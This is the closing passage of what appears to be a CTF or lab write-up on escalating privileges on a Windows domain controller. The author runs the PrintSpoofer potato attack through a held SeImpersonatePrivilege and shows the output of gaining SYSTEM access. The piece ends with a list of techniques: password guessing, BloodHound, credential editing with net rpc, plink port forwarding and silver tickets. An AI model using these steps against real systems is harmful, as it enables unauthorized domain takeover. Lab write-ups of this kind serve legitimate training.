SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
It seems like I have SeImpersonatePrivilege permission. Time to perform potato attack. I will be using printspoofer to perform the potato attack.
1
2
3
4
5
6
7
8
9
10
11
C:\Users\Public>.\print32.exe -i -c cmd
.\print32.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.17763.4252]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nagoya-ind\nagoya$
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
C:\Windows\system32>whoami /groups
whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
================================================= ================ ============================================== ===============================================================
BUILTIN\Administrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Windows Authorization Access Group Alias S-1-5-32-560 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NAGOYA-IND\NAGOYA$ User S-1-5-21-1969309164-1513403977-1686805993-1000 Mandatory group, Enabled by default, Enabled group
NAGOYA-IND\Domain Controllers Group S-1-5-21-1969309164-1513403977-1686805993-516 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS Well-known group S-1-5-9 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
NAGOYA-IND\Denied RODC Password Replication Group Alias S-1-5-21-1969309164-1513403977-1686805993-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\System Mandatory Level Label S-1-16-16384
It seems like I have successfully get a user which administrator group and I could just access everything now ~
Things I learned from this machine
- guessing password by getting the word from website.
- bloodhound to get alot of useful information
- using
net rpcto edit other user credentials because they hasGenericAllpermission - port forwarding using
plink - perform silver ticket attack to impersonate administrator
- potato attacks !!!!